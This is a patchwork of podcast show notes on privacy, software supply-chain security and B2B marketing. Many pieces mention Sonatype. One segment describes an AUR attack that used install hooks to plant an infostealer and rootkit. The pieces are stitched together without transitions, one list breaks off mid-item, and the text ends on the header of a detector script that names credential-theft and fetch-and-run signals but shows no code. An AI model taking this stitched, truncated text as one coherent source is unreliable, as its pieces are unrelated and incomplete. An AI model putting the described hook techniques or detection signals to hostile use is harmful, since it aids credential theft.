Show Notes - https://forum.closednetwork.io/t/episode-58-the-price-of-being-watched/198
Website / Donations / Support - https://closednetwork.io/support/
BTC Lightning Donations - closednetwork@getalby.com / simon@primal.net
Thank You Patreons & Direct Supporters! - https://www.patreon.com/closednetwork
https://xmrchat.com/closednetwork
Direct Support - https://closednetwork.io
Subscribe Without Patreon - https://closednetwork.io/#/portal/signup
Michael Bates - Privacy Bad Ass
David - Privacy Bad Ass
TK - Privacy Bad Ass
Trying - Privacy Bad Ass
VO - Privacy Bad Ass
MrMilkMustache - Privacy Supporter
Hutch - Privacy Advocate
Inferno_Potato - Privacy Supporter
Dolores Y - Privacy Supporter
Direct Support - Craig D
Thank You Producers! You Produce This Show!
TOP LIGHTNING BOOSTERS !!!! THANK YOU !!!
@bon - thousands and thousands and thousands of SATs!!
@fireflygow - 5,000 sats!!
frigolay - 34,540 SATs.. HOLY SHITE
wardemoff - 5,000 SATs
Silas Thornbrook
Thank You To Our Moderators:
Unintelligentseven - Follow on NOSTR primal.net/p/npub15rp9gyw346fmcxgdlgp2y9a2xua9ujdk9nzumflshkwjsc7wepwqnh354d
MaddestMax - Follow on NOSTR primal.net/p/npub133yzwsqfgvsuxd4clvkgupshzhjn52v837dlud6gjk4tu2c7grqq3sxavt
Join Our Community
Closed Network Forum - https://forum.closednetwork.io
Join Our Matrix Channels!
Main - https://matrix.to/#/#closedntwrk:matrix.org
Off Topic - https://matrix.to/#/#closednetworkofftopic:matrix.org
SimpleX Group Chat - https://smp9.simplex.im/g#SRBJK7JhuMWa1jgxfmnOfHz7Bl5KjnKUFL5zy-Jn-j0
Join Our Mastodon server! https://closednetwork.social
Follow Simon On The Socials
Mastodon - https://closednetwork.social/@simon
NOSTR - Public Address - npub186l3994gark0fhknh9zp27q38wv3uy042appcpx93cack5q2n03qte2lu2 - primal.net/simon
Twitter / X - @ClosedNtwrk
Instagram - https://www.instagram.com/closednetworkpodcast/
YouTube - https://www.youtube.com/@closednetwork
Email - simon@closednetwork.io
Special Thanks to EloquentWinter for creating "A Linux guide on MAC address randomization": https://forum.closednetwork.io/t/a-linux-guide-on-mac-address-randomization/189

TOPICS

Encourage curiosity - This week ties together a single thread: someone else holds your data, and therefore holds the power. From algorithmic pricing to supply-chain malware to government scanning to cloud-AI assistants, and the hopeful counter-move: taking your data back. The episode theme is curiosity: in every story, one extra question would have changed the outcome.

Segment 1 — Surveillance Pricing
Inspired by More Perfect Union, "We Found the Radical Solution to Surveillance Pricing"
Surveillance pricing (a.k.a. personalized / surveillance-based pricing) = charging you an individual price based on sensitive data about you — purchase history, browsing, geolocation, social activity, even biometric and financial signals. The economic endgame is "perfect price discrimination": charging each person their exact maximum.
DoorDash holds a patent describing promotions based on a user's stress level.
Delta Air Lines (with AI firm Fetcherr) has talked about expanding generative-AI pricing to ~20% of domestic fares, with ambitions to go further. Senators (Gallego, Blumenthal, Warner) and House members demanded answers.
A Groundwork Collaborative / Consumer Reports / More Perfect Union study found different shoppers charged different prices for identical Instacart items. Former FTC chair Lina Khan has voiced concern.
The "radical" fix is a law: New York's proposed One Fair Price Act would ban surveillance pricing outright — one posted price for everyone.
Defensive moves (partial): private/container browsing, block cookies, disable ad personalization, use a VPN, compare logged-out vs. logged-in prices. Honest caveat: this is a structural problem — regulation, not browser tricks, is the real fix.
Curious question: Is this price the market — or is it me being read?

Segment 2 — "Arch malware btw": the AUR supply-chain attack
Inspired by Michael Tunnell and Switched to Linux — developing story, June 2026.
The Arch User Repository (AUR) is a collection of community-maintained, unvetted package build scripts (PKGBUILDs). In a ~24-hour window, a coordinated attack poisoned a large number of packages — reports cite 1,500+ touched, with community trackers confirming ~400–500 malicious package names and rising.
How: Attackers adopted orphaned packages (abandoned by maintainers — anyone can claim them) and edited the PKGBUILD to add a pre/post-install hook that pulls a malicious npm package, atomic-lockfile (Sonatype tracked one strand as the "Atomic Arch" campaign).
Payload: A Linux infostealer + optional root-only eBPF rootkit. Targets developer secrets — browser creds/cookies, SSH keys, GitHub creds, Vault/npm tokens, Docker/Podman, VPN configs, shell history, Slack/Teams/Discord/Telegram, crypto wallets. eBPF lets it run in-kernel and hide processes/files/connections.
If you were hit and the rootkit deployed: rotate every credential (from a clean machine) and reinstall from scratch. A normal uninstall is not enough.
Status: Maintainers are removing malicious commits and banning accounts; the official repos of Arch-based distros (CachyOS, Garuda, Chaotic-AUR) were not infected — only users who installed or upgraded a compromised AUR package during the window were affected. A community checker script and an affected-package list were published within hours.
Action checklist (Arch users):
1. pacman -Qm → list your foreign (AUR) packages.
2. Compare against the community list / run the checker script (CachyOS advisory).
3. If matched → rotate credentials from a clean machine, then clean-reinstall.
Curious habit: Before installing, ask who maintains this, when did it last legitimately update, and did ownership recently change? On the AUR, read the PKGBUILD — the malicious line was visible to anyone who looked.

Segment 3 — UK Device Scanning: 90 Days to Comply
Inspired by "Signal's Warning: The UK's Phone Scanning Plan Just Got Real"
The UK government signaled that phone makers (Apple, Google) will get ~90 days to start scanning photos on young people's devices for nude images. Running alongside: Online Safety Act powers for Ofcom aimed at encrypted messaging (key report expected ~April). The mechanism: client-side scanning — every message/image checked on your device, before encryption.
Why it matters: Client-side scanning doesn't break encryption directly — it inspects content before the lock clicks shut. The "end-to-end encrypted" label survives, but the privacy guarantee (nobody is looking) is gone.
Signal's position: scanning won't protect children and builds surveillance infrastructure that "endangers us all."
Security: once scanning exists on every device, the match database can be expanded — swap it and you're scanning for slogans, documents, faces. Signal would withdraw from the UK rather than build a backdoor. Mullvad raised parallel alarms.
Misdiagnosis: real child safety = better-funded education, social services, AI-platform guardrails — not default scanning. Rallying phrase: "Surveillance is not safety."
Bigger picture: This is a template (cf. the EU's "Chat Control"). Sympathetic justification + a mechanism that, once built, can point anywhere.
Curious question: Not "is the goal good?" (it usually is) but "what else can this machine do once built, and who decides what it points at next?"

Segment 4 — iOS 27 at WWDC: the Privacy Fine Print
Apple WWDC 2026 keynote coverage.
Genuine wins: New Siri AI (next-gen Apple Intelligence) uses a tiered architecture — simple requests on-device, moderate ones via Private Cloud Compute (inspectable, hardened). Plus stronger family safety: child-account setup, parental controls, redesigned Screen Time, new Safari safeguards.
The fine print (two concerns):
1. Total context access. Siri AI indexes across your messages, emails, photos, and apps — a unified, queryable view of your whole digital life. Conversation history syncs via iCloud ("with privacy protections"), but the strength of that protection depends on whether you've enabled Advanced Data Protection (Apple's E2EE for iCloud — not on by default).
2. New Google dependency. Apple made official a Gemini partnership — the heaviest reasoning routes to Google Cloud. Apple says queries are anonymized and tokenized so neither Apple nor Google can link them to you (Federighi: "privacy in AI is non-negotiable"). Critics counter that PCC/anonymization is "only as private as the weakest link" — if Google retains any path to usage data for training/debugging, the guarantee weakens.
Takeaway: Apple's defaults are still among the best of the mainstream — but don't let "privacy" in a keynote switch off your curiosity. On update: review Siri AI indexing settings, turn on Advanced Data Protection, and understand where your hardest queries travel.
Curious question: A magical assistant that knows everything about you is, by definition, a system granted everything about you. Did you make that trade on purpose?

Segment 5 — Self-Hosting 101: What to Migrate First
Original recurring segment — Part 1 (scope). Part 2 next week: hands-on photos build.
Self-hosting = run the services yourself, on hardware you own, instead of renting space on a company's servers. It's the deliberate counter-move to every other story this week. Honest caveat: you become your own IT department (backups, updates, downtime). Don't eat the elephant at once — scope first.
The five candidates (ranked by impact-to-effort):
1. Photos — highest emotional and surveillance value (faces, locations, timestamps). Self-host with Immich (Google-Photos-like: app, auto camera-roll backup, face/object search). Difficulty: moderate; biggest single win.
2. Calendar — a forward-looking map of your life. CalDAV via Radicale or Nextcloud; syncs to your existing calendar app. Easy–moderate; great first project.
3. Contacts — your social graph (everyone else's data too). CardDAV on the same Radicale/Nextcloud server — bundle it with calendar. Easy.
4. File backups — documents and digital paperwork. Often Nextcloud.
#349 | Megan Lueders (CMO, Sonatype), Ido Mart (CMO, ManyChat), and Kim Storin (CMO, Zayo) join Dave for a live CMO panel from an Exit Five meetup in Austin. Megan breaks down how the pace of change in marketing has outrun every other function in the business. Ido talks about why your strengths as a CMO only matter if you choose the right environment for them. And Kim shares how she measures marketing impact in a company with long, complex sales cycles and drops a line worth writing down: marketing is never green when the business is red. They also get into pipeline attribution, founder-led content, LinkedIn influencers, and what most CMOs get wrong about aligning with their CEO on what marketing actually is.

Timestamps
(00:00) - Intros: Megan Lueders (Sonatype), Ido Mart (ManyChat), Kim Storin (Zayo)
(05:33) - What they wish they'd known when they became CMO
(10:32) - How marketing has changed more than any other function
(13:07) - How to measure marketing impact in long, complex sales cycles
(14:37) - Growth at all costs vs. efficiency: how they're navigating it
(21:55) - How to talk to your CFO about marketing spend
(25:28) - What's not working anymore: email, granular data, paid media
(32:52) - What is working: sales enablement, influencers, product marketing
(36:50) - Why B2B is actually more emotional than consumer buying
(40:39) - Audience Q&A: defending channels that work but don't have clean attribution
(42:30) - Acquisition vs. retention: where are you actually spending time
(46:29) - Founder-led content and executive presence on social
(49:58) - LinkedIn influencers: is the spend worth it
(52:49) - Sales enablement and how to make messaging stick internally

Join 50,000 people who get Dave's Newsletter here: https://www.exitfive.com/newsletter
Learn more about Exit Five's private marketing community: https://www.exitfive.com/

***
Brought to you by:
Knak - A no-code, campaign creation platform that lets you go from idea to on-brand email and landing pages in minutes, using AI where it actually matters. Learn more at knak.com/exitfive, or check out the MCP server by clicking this link.
Vector - A contact-level ads platform that lets you build audiences from actual people on your site, clicking your ads, and checking out your competitors. Learn more at vector.co, and get on the waitlist for their new MCP server by clicking here.
Compound Growth Marketing - A full-funnel demand generation agency that helps high-growth cybersecurity, DevOps, and enterprise software companies drive more pipeline through AI SEO, paid media, and go-to-market engineering. Visit compoundgrowthmarketing.com and tell them Dave sent you.
***
Thanks to my friends at hatch.fm for producing this episode and handling all of the Exit Five podcast production. They give you unlimited podcast editing and strategy for your B2B podcast. Get unlimited podcast editing and on-demand strategy for one low monthly cost. Just upload your episode, and they take care of the rest. Visit hatch.fm to learn more.
Red team exercises set goals to see whether a particular outcome can be accomplished through a simulated attack, but the ultimate outcome should be educating the org about how to improve the tools and processes that make attacks harder to pull off. Gwyddon "Data" Owen shares his experience building a red team, creating an exercise, and leveraging the results to improve security. And while the adoption of LLMs will accelerate a red team's activities, there are still plenty of foundational security controls that orgs can establish that would require a red team to be not just fast, but fast and very careful.

Coding Agents Are Getting More Cautious, But Not Safer
A new study finds that while frontier AI coding models are hallucinating less than they did a year ago, they still carry a significant amount of avoidable software risk when left ungrounded. Sonatype's research shows that connecting these models to real-time software intelligence dramatically improves remediation quality and reduces critical and high-severity vulnerability exposure by 60–70%. The takeaway is clear: safer AI-assisted development will depend not just on better models, but on grounding them in accurate, current dependency and vulnerability data. This segment is sponsored by Sonatype. Read the study: https://securityweekly.com/sonatypersac

How We Achieve Agentic Outcomes in CyberSecurity: The "Do-It-For-Me" Mobile Defense
If you look at deepfakes, synthetic identity, social engineering, and new malware variants coming to market, it seems like attackers have a first-mover advantage in using AI. The volume and variety of threats are growing faster than the current cyber stack can address. Against this backdrop, organizations are moving away from "do-it-yourself" delivery models (more tools, more alerts, more headcount) to "do-it-for-me" agentic AI delivery models (using platforms that unify data, execute policy, and automate outcomes). The emphasis outside of cyber is on empowering the expert human-in-the-loop, so teams spend less time in the noise and more time delivering business outcomes. This segment explores how cybersecurity leaders can make the most of the AI Age, leveraging it for good while staying relevant amid the explosive AI adoption curve. This segment is sponsored by Appdome. Visit https://securityweekly.com/appdomersac to learn more about them!

Visit https://www.securityweekly.com/asw for all the latest episodes!
Show Notes: https://securityweekly.com/asw-379
SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
Compromised DVRs and Finding Them in the Wild
https://isc.sans.edu/diary/%5BGuest%20Diary%5D%20Compromised%20DVRs%20and%20Finding%20Them%20in%20the%20Wild/32886

Cisco ISE RCE Vulnerability and WebEx Auth Bypass CVE-2026-20184 CVE-2026-20180 CVE-2026-20186
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-rce-4fverepv
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-cui-cert-8jSZYhWL

Windows Defender 0-Day (RedSun)
https://github.com/Nightmare-Eclipse/RedSun

Sonatype Vulnerability CVE-2026-5189
https://support.sonatype.com/hc/en-us/articles/50817138825491-CVE-2026-5189-Nexus-Repository-3-Hardcoded-Credential-in-Internal-Database-Component-2026-04-15
Josh chats with Brian Fox from Sonatype about their 2026 State of the Software Supply Chain report. Most of the numbers continue to grow at alarming rates, but there are some new, interesting findings in this one. We discuss end of life in open source, which is tough to define. We touch on what using AI with open source dependencies looks like (and why it's broken), and we discuss the challenge of upgrading your open source dependencies in a way that doesn't break everything. It's a great report and a great discussion. The show notes and blog post for this episode can be found at https://opensourcesecurity.io/2026/2026-03-SOTSSC-Brian-Fox/
Sara Chevrette, Head of Global Talent Acquisition at Sonatype, joins James Mackey to unpack the connection between psychology and recruiting talent. She shares how values drive hiring, pushing for curiosity, and the importance of building a strong culture within the workplace.
Thank you to our sponsor, SecureVision, for making this show possible!
Follow us: https://www.linkedin.com/company/82436841/
SecureVision: #1 Rated Embedded Recruitment Firm on G2! https://www.g2.com/products/securevision/reviews
Thanks for listening!
In this episode, Dave interviews Mitchell Johnson, Chief Product Development Officer at Sonatype, about the notion of a Hippocratic Oath for developers, where you do no harm to the codebase, and how AI is impacting that.
They discuss:
The responsibility a developer has to keep their codebase healthy whenever they add a new feature
How being able to output code faster with AI makes it harder to have visibility into how changes impact downstream systems
How AI-assisted coding may actually slow things down
Organizations pour millions into protecting running applications — yet attackers are targeting the delivery path itself. This episode of AppSec Contradictions reveals why CI/CD and cloud pipelines are becoming the new frontline in cybersecurity.
Derek Weeks is the Chief Marketing Officer at Katalon, a company that provides an AI-augmented software quality management platform for automating testing and improving software development workflows. He brings over 30 years of marketing experience, including leadership roles at Sonatype and the Linux Foundation. Derek co-founded All Day DevOps and has pioneered efforts in open-source software supply chain security. He is also the author of Unfair Mindshare: A CMO's Guide to Community-Led Marketing in a Product-Led World.

In this episode…
Building a loyal audience is harder than ever in the crowded B2B SaaS landscape. Traditional marketing tactics can struggle to break through, and customer acquisition costs continue to rise. How can companies create authentic connections that lead to long-term growth?

According to Derek Weeks, a seasoned marketing leader and pioneer in community-led strategies, the answer is to put audience needs first and consistently provide value before selling anything. He highlights that trust is earned by creating spaces where people can learn, share, and engage without feeling pitched. By leveraging user-generated content and empowering practitioners to create authentic conversations, he has seen communities grow to hundreds of thousands of members.

In this episode of the Revenue Engine Podcast, host Alex Gluz sits down with Derek Weeks, Chief Marketing Officer at Katalon, to discuss how community-led marketing drives sustainable B2B SaaS growth. They explore strategies to scale a product community from 60,000 to 117,000 members, why user-generated content lowers acquisition costs, and how to adapt content for the age of LLM search. Derek also shares lessons from building the All Day DevOps community and keeping audiences engaged over time.
Tyler Warden, SVP of Product at Sonatype, shares surprising research on security, productivity and prioritization, with actionable strategies for organizational transformation.
Topics Include:
Tyler from Sonatype (Maven creators) shares research on security culture in development
Security is more cultural than tooling, with rising supply chain attacks
Development speeds up while global regulations rapidly change across markets
Tyler's background: wanted to be a Broadway conductor, not tech speaker
Beethoven's 9th Symphony story: nephew missed a dot, changing tempo forever
We can "be the dot" - small changes creating big organizational impact
Three organization types: Leaders (collaborative), Adapters (balanced), Protectors (security-first)
Leaders achieve best productivity and security but face executive skepticism
Research reveals balanced teams outperform purely security-focused or productivity-focused approaches
High-performance teams go faster AND stay more secure than alternatives
"Yes" philosophy from improv comedy: fun happens when we enable innovation
Apply proven supply chain principles from manufacturing to software development security
Participants:
Tyler Warden – Senior Vice President, Product, Sonatype
Further Links:
Sonatype: Website | LinkedIn | AWS Marketplace
See how Amazon Web Services gives you the freedom to migrate, innovate, and scale your software company at https://aws.amazon.com/isv/
This week we talk about Proton's new 2FA app, a new kernel that has been released and of course your feedback.

-- During The Show --

00:54 Intro
Kids carry plague

02:15 Networking - Fred
OpenWrt on Ubiquiti Gear
If it's not local, you don't own it
OpenWrt One (https://openwrt.org/toh/openwrt/one?s[]=openwrt)

05:53 Video Calls - Mike
Nextcloud
Home Assistant Voice Preview (https://www.home-assistant.io/voice-pe/)
Sip Trip Phone (https://apps.nextcloud.com/apps/sip_trip_phone)

12:29 Networking - Charlie
UniFi Blog Post (https://blog.ui.com/article/introducing-unifi-os-server)
How Noah thinks it through
Steve's approach
Closed source is a placeholder
This is a good thing

17:45 Continuing Cisco Conversation - Michael
Podcast (https://pca.st/episode/82676b1b-49b5-4155-b462-8b9d81ff6197)
Juniper JNCIA Repo (https://github.com/rikosintie/JNCIA)
Juniper DevOps Repo (https://github.com/rikosintie/Juniper-DevOps)
DevNet Associate Certification (https://github.com/rikosintie/DevNetAssoc)
CookBooks (https://github.com/rikosintie/CookBook)
Cisco EEM (https://github.com/rikosintie/Cisco-EEM)

20:15 News Wire
Shotcut 245.07 - shotcut.org (https://shotcut.org/blog/new-release-250726)
Linux 6.16 - kernelnewbies.org (https://kernelnewbies.org/Linux_6.16)
GNU Linux-Libre 6.16 - lwn.net (https://lwn.net/Articles/1031540)
Fractal 5 Pro - hackaday.com (https://hackaday.com/2025/08/04/open-source-5-axis-printer-has-its-own-slicer)
Sonatype's Findings - sonatype.com (https://www.sonatype.com/blog/sonatype-uncovers-global-espionage-campaign-in-open-source-ecosystems)
Plague Backdoor - thehackernews.com (https://thehackernews.com/2025/08/new-plague-pam-backdoor-exposes.html)
UNC2891 Bank Heist - group-ib.com (https://www.group-ib.com/blog/unc2891-bank-heist)
Auto-Color Backdoor - thehackernews.com (https://thehackernews.com/2025/07/hackers-exploit-sap-vulnerability-to.html)
Recent Fedora Outage - fedoraproject.org (https://discussion.fedoraproject.org/t/for-your-information-ddos-affecting-most-of-the-fedoraproject-org-services/161568/4)
OpenAI Models - openai.com (https://openai.com/index/introducing-gpt-oss)
Meta Won't Open Source "superintelligence" AI Models - techcrunch (https://techcrunch.com/2025/07/30/zuckerberg-says-meta-likely-wont-open-source-all-of-its-superintelligence-ai-models), pcmag.com (https://www.pcmag.com/news/zuckerberg-walks-back-open-source-ai-pledge-citing-safety-risk)
Cogito v2 - artificialintelligence-news.com (https://www.artificialintelligence-news.com/news/deep-cogito-v2-open-source-ai-hones-its-reasoning-skills)
Agntcy Framework - forbes.com (https://www.forbes.com/sites/moorinsights/2025/07/29/the-agntcy-framework-for-agentic-ai-moves-to-the-linux-foundation)

22:29 Steve and Self Hosted AI
Started with AI to learn
Asked AI to make show notes
Using AI to look for past gift recommendations
Download script
Beautiful Soup (https://en.wikipedia.org/wiki/Beautiful_Soup_(HTML_parser))
Notebook LM
Whisper UI / Fast Whisper
Ethical AI issues
AI makes people lazy
Making content "for AI"

44:15 Linux Kernel 6.16
BTRFS Bug
LUP 626 (https://linuxunplugged.com/626)
Intel Trusted Domain Extensions
9to5Linux (https://9to5linux.com/linux-kernel-6-16-officially-released-this-is-whats-new)

46:46 Proton Authenticator App
linuxiac.com (https://linuxiac.com/proton-launches-free-open-source-authenticator-app/)
Proton Authenticator App is open source
Encrypted sync
No ads or tracking
Direct import/export
Push notifications
Ente Auth (https://ente.io/auth/)

-- The Extra Credit Section --
For links to the articles and material referenced in this week's episode check out this week's page from our podcast dashboard!
This Episode's Podcast Dashboard (http://podcast.asknoahshow.com/454)
Phone Systems for Ask Noah provided by Voxtelesys (http://www.voxtelesys.com/asknoah)
Join us in our dedicated chatroom #GeekLab:linuxdelta.com on Matrix (https://element.linuxdelta.com/#/room/#geeklab:linuxdelta.com)

-- Stay In Touch --
Find all the resources for this show on the Ask Noah Dashboard
Ask Noah Dashboard (http://www.asknoahshow.com)
Need more help than a radio show can offer? Altispeed provides commercial IT services and they're excited to offer you a great deal for listening to the Ask Noah Show. Call today and ask about the discount for listeners of the Ask Noah Show!
Altispeed Technologies (http://www.altispeed.com/)
Contact Noah live [at] asknoahshow.com

-- Twitter --
Noah - Kernellinux (https://twitter.com/kernellinux)
Ask Noah Show (https://twitter.com/asknoahshow)
Altispeed Technologies (https://twitter.com/altispeed)
Chief Product Development Officer Mitchell Johnson discusses how Sonatype protects enterprise developers from malicious open source components while keeping them productive through AI.
Topics Include:
Sonatype provides software supply chain solutions for enterprises using open source components
They serve large enterprises, government agencies, and critical infrastructure providers globally
Main challenge: keeping developers productive while maintaining secure software supply chains
Cybercrime and supply chain attacks are massive, growing industries threatening developers
AI adoption is happening faster than expected, profoundly changing development workflows
Bad actors evolved from waiting for vulnerabilities to creating malicious components
Malicious open source components specifically target developer and DevOps toolchains
Sonatype's security research team uses AI/ML to analyze every open source component
They can predict and block malicious components before entering customer environments
AWS partnership helps Sonatype meet customers where they want to do business
Partnership focuses on go-to-market alignment, not just technical integration
AWS sales teams should be treated as extensions of your own sales organization
Understanding AWS sales structure and incentives is crucial for successful partnerships
AI development is following the same pattern as open source adoption twenty years ago
"Shadow AI" parallels the earlier "shadow IT" trend with open source software
AI speeds up code generation but security review processes haven't kept pace
Developers need a "Hippocratic Oath" - taking responsibility for AI-generated code output
Within 24 months, professionals not skilled in AI will struggle to stay relevant
Sonatype's culture encourages curiosity, experimentation, and accepts failure as part of innovation
Their core mission: help developers focus on innovation, not security chores
Participants: Mitchell Johnson – Chief Product Development Officer, Sonatype
Further Links: Sonatype Website; Sonatype on AWS Marketplace
See how Amazon Web Services gives you the freedom to migrate, innovate, and scale your software company at https://aws.amazon.com/isv/
ArmorCode unveils Anya, the first agentic AI virtual security champion designed specifically for AppSec and product security teams. Anya brings together conversation and context to help AppSec, developers and security teams cut through the noise, prioritize risks, and make faster, smarter decisions across code, cloud, and infrastructure. Built into the ArmorCode ASPM Platform and backed by 25B findings, 285+ integrations, natural language intelligence, and role-aware insights, Anya turns complexity into clarity, helping teams scale securely and close the security skills gap. Anya is now generally available and included as part of the ArmorCode ASPM Platform. Visit https://securityweekly.com/armorcodersac to request a demo! As "vibe coding", the practice of using AI tools with specialized coding LLMs to develop software, is making waves, what are the implications for security teams? How can this new way of developing applications be made secure? Or have the horses already left the stable? Segment Resources: https://www.backslash.security/press-releases/backslash-security-reveals-in-new-research-that-gpt-4-1-other-popular-llms-generate-insecure-code-unless-explicitly-prompted https://www.backslash.security/blog/vibe-securing-4-1-pillars-of-appsec-for-vibe-coding This segment is sponsored by Backslash. Visit https://securityweekly.com/backslashrsac to learn more about them! The rise of AI has largely mirrored the early days of open source software. With rapid adoption amongst developers who are trying to do more with less time, unmanaged open source AI presents serious risks to organizations. Brian Fox, CTO & Co-founder of Sonatype, will dive into the risks associated with open source AI and best practices to secure it. 
Segment Resources: https://www.sonatype.com/solutions/open-source-ai https://www.sonatype.com/blog/beyond-open-vs.-closed-understanding-the-spectrum-of-ai-transparency https://www.sonatype.com/resources/whitepapers/modern-development-in-ai-era This segment is sponsored by Sonatype. Visit https://securityweekly.com/sonatypersac to learn more about Sonatype's AI SCA solutions! The surge in AI agents is creating a vast new cyber attack surface with Non-Human Identities (NHIs) becoming a prime target. This segment will explore how SandboxAQ's AQtive Guard Discover platform addresses this challenge by providing real-time vulnerability detection and mitigation for NHIs and cryptographic assets. We'll discuss the platform's AI-driven approach to inventory, threat detection, and automated remediation, and its crucial role in helping enterprises secure their AI-driven future. To take control of your NHI security and proactively address the escalating threats posed by AI agents, visit https://securityweekly.com/sandboxaqrsac to schedule an early deployment and risk assessment. Visit https://www.securityweekly.com/asw for all the latest episodes! Show Notes: https://securityweekly.com/asw-332
In this episode of the FINOS Open Source in Finance webinar series, Karl Moll hosts an engaging panel discussion with Tyler Warden from Sonatype and Aaron Erickson from Nvidia. The topic is 'The Unexpected Risks of AI in Finance,' covering hidden and novel security risks in AI-driven financial systems, the importance of hardware in AI security, and regulatory approaches to AI compliance. The panelists delve into common misconceptions, real-world examples of AI risks, software supply chain issues, and actionable advice for securing AI pipelines. They also discuss the fundamental role of human accountability and the importance of collaboration between security and engineering teams.
00:00 Welcome and Introduction
03:40 Panelist Introductions
05:43 Common Misconceptions in AI Security
08:37 Hidden Risks of AI in Finance
16:52 Regulatory Approaches to AI Risks
23:54 Advice for Compliance Teams
30:56 The Importance of Fundamentals in AI
31:37 AI's Role in Speeding Up Reaction Times
32:56 Building Security into AI Pipelines
36:02 Operational Collaboration for AI Security
43:07 Designing User-Centric AI Systems
48:40 Rapid Fire Q&A on AI Security
55:23 Final Thoughts and Recommendations
Find more info about FINOS:
On the web: https://www.finos.org
Open Source in Finance Forum (OSFF Conference): https://www.finos.org/osff-2025
2024 State of Open Source in Financial Services Download: https://www.finos.org/state-of-open-source-in-financial-services-2024
FINOS Current Newsletter Here: https://www.finos.org/newsletter
LinkedIn: https://www.linkedin.com/company/finosfoundation
Twitter: https://twitter.com/FINOSFoundation
About FINOS
FINOS (The Fintech Open Source Foundation) is a nonprofit whose mission is to foster the adoption of open source, open standards, and collaborative software development practices in financial services. It is the center for open source developers and the financial services industry to build new technology projects that have a lasting impact on business operations. 
As a regulatory compliant platform, the foundation enables developers from these competing organizations to collaborate on projects with a strong propensity for mutualization. It has enabled codebase contributions from both the buy- and sell-side firms and counts over 50 major financial institutions, fintechs and technology consultancies as part of its membership. FINOS is also part of the Linux Foundation, the largest shared technology organization in the world. Get involved and join FINOS as a Member.
Eddie Knight, OSPO lead at Sonatype, discusses how the EU Cyber Resilience Act can help improve your software project's security and, at the same time, slow down the alarming acceleration of software supply chain attacks.
Read a transcript of this interview: https://bit.ly/3RDMPVX
Subscribe to the Software Architects' Newsletter for your monthly guide to the essential news and experience from industry peers on emerging patterns and technologies: https://www.infoq.com/software-architects-newsletter
Upcoming Events:
InfoQ Dev Summit Boston (June 9-10, 2025) Actionable insights on today's critical dev priorities. devsummit.infoq.com/conference/boston2025
InfoQ Dev Summit Munich (October 15-16, 2025) Essential insights on critical software development priorities. https://devsummit.infoq.com/conference/munich2025
QCon San Francisco 2025 (November 17-21, 2025) Get practical inspiration and best practices on emerging software trends directly from senior software developers at early adopter companies. https://qconsf.com/
QCon AI NYC 2025 (December 16-17, 2025) https://ai.qconferences.com/
The InfoQ Podcasts: Weekly inspiration to drive innovation and build great teams from senior software leaders. Listen to all our podcasts and read interview transcripts:
- The InfoQ Podcast https://www.infoq.com/podcasts/
- Engineering Culture Podcast by InfoQ https://www.infoq.com/podcasts/#engineering_culture
- Generally AI: https://www.infoq.com/generally-ai-podcast/
Follow InfoQ:
- Mastodon: https://techhub.social/@infoq
- Twitter: twitter.com/InfoQ
- LinkedIn: www.linkedin.com/company/infoq
- Facebook: bit.ly/2jmlyG8
- Instagram: @infoqdotcom
- Youtube: www.youtube.com/infoq
Write for InfoQ: Learn and share the changes and innovations in professional software development.
- Join a community of experts.
- Increase your visibility.
- Grow your career.
https://www.infoq.com/write-for-infoq
Get up to speed with everything that mattered in cybersecurity this month. In this episode of The Cyberman Show, we break down March 2025's top cyber incidents, threat actor tactics, security product launches, and vulnerabilities actively exploited in the wild. Here's what we cover:
In this episode, Dave sits down with Megan Lueders (CMO at Sonatype), Ido Mart (CMO at ManyChat), and Kimberly Storin (CMO at Zayo) for a live CMO panel discussion at Exit Five's Austin marketing meetup. These marketing leaders share what's working and what's not in B2B marketing today and how the role of the CMO is evolving.
Dave, Megan, Ido, and Kimberly cover:
What every new CMO needs to know about leading a marketing org
How to align with CEOs, CFOs, and key stakeholders to drive business impact
The biggest marketing shifts happening right now (and what's no longer working)
How to prove marketing's impact in the era of efficiency
Timestamps
(00:00) Introduction to the CMO panel
(03:31) The evolving role of the CMO in 2025
(06:57) The biggest challenges marketing leaders face today
(10:04) How to align marketing with CEOs, CFOs, and key stakeholders
(13:39) What every new CMO needs to know when stepping into the role
(17:14) The marketing strategies that are working right now (and what's not)
(21:01) Why B2B marketing is more emotional than most people realize
(25:45) How to prove marketing's impact in a data-driven, efficiency-focused era
(29:27) The shift from demand gen to brand-led growth
(32:52) The role of storytelling and positioning in B2B marketing success
(37:07) Building a high-performing marketing team and the skills CMOs need today
(40:47) Key takeaways and final advice for marketing leaders
Send guest pitches and ideas to hi@exitfive.com
Join the Exit Five Newsletter here: https://www.exitfive.com/newsletter
Check out the Exit Five job board: https://jobs.exitfive.com/
Become an Exit Five member: https://community.exitfive.com/checkout/exit-five-membership
***
Today's episode is brought to you by Customer.io. You know that feeling when you open your inbox, and it's just... noise? Bad marketing. Spam. Most companies are out here just talking at customers, not talking to them. Marketing messages should do more than just land in an inbox; they should create impact and drive real engagement. Customer.io helps companies send smarter, more personalized messages using first-party data. Their platform enables brands to reach customers at the right time, in the right place, on the right channel, whether that's email, SMS, push notifications, or beyond. And the best part is that it's all automated, so you're not just blasting campaigns and hoping for the best. You're running a machine that delivers real, human engagement at scale. 7,000+ brands already trust Customer.io to make their marketing feel less like noise and more like connection. Join them by visiting Customer.io to get started.
***
Thanks to my friends at hatch.fm for producing this episode and handling all of the Exit Five podcast production. They give you unlimited podcast editing and strategy for your B2B podcast. Get unlimited podcast editing and on-demand strategy for one low monthly cost. Just upload your episode, and they take care of the rest. Visit hatch.fm to learn more
Brian Fox discusses findings from a recent Sonatype report about the growing challenge of malicious packages in open source repositories. At the time of recording there were over 820,000 malicious packages in public repositories. Brian explains why certain ecosystems are more vulnerable than others, how behavioral detection methods can identify suspicious packages, and the challenges in solving this problem. The blog post for this episode can be found at https://opensourcesecurity.io/2025/2025-03-oss_malware_brian_fox/
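As an added illustration of what a behavioral signal on a package can look like (example code written for this page; it is not Sonatype's detector and not anything from the episode), the script below screens an npm package.json for install-time lifecycle hooks and flags commands that fetch and pipe remote content into a shell, decode embedded payloads, evaluate code dynamically, or touch credential files. Both manifests are constructed inline for the demo, and the signal list, labels and scoring are assumptions rather than any vendor's rules.

```python
"""Static screen for suspicious npm install hooks.

Added illustrative example for this page; not Sonatype's detector and not code
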